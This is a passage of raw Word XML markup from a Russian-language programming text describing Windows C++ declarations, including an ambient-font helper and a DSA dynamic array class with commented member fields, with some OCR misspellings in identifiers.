          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_ClearLabel</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1910"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">(void) </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="19BookmanOldStyle1"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="192"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_Ciea</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1913"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>AmbientFont</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1910"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(void)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="191"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2727"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HDSA</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HDSA;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="191"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="2727"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HGDIOBJ</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hObj ect;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="191"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">AmbientFont </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="190"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>*pAmbient;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="510"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="540"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>) ;</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Объект этого класса хранит данные в структуре данных </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>DSA (Dynamic Structure Arrays).</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11"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">class DSA </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1912"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1913"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="191"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="4011"/>
          <w:tab w:val="left" w:pos="4310"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="199"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1912"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>idxLastltem;</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1912"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Last index that the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="197"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">array </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="197"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hold.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="191"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="4314"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1914"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">HLOCAL </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1913"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">hMemArrayData; </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="197"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Handle </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="196"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>heap data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="191"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="4011"/>
          <w:tab w:val="left" w:pos="4310"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="195"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1912"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cltems;</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1912"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Count </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="194"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="197"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>items.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="191"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="4011"/>
          <w:tab w:val="left" w:pos="4310"/>
          <w:tab w:val="center" w:pos="5948"/>
          <w:tab w:val="left" w:pos="6244"/>
          <w:tab w:val="center" w:pos="6647"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="195"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1912"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cbltem;</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1912"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Size, in </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="197"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bytes,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="197"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="194"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="194"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="196"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="196"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="197"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>item.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="191"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="4011"/>
          <w:tab w:val="left" w:pos="4310"/>
          <w:tab w:val="center" w:pos="5948"/>
          <w:tab w:val="left" w:pos="6249"/>
          <w:tab w:val="right" w:pos="8674"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="195"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1970"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cltemGrow;</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="1970"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="194"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="197"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Number </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>of items</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>by</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="197"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="197"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="198"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
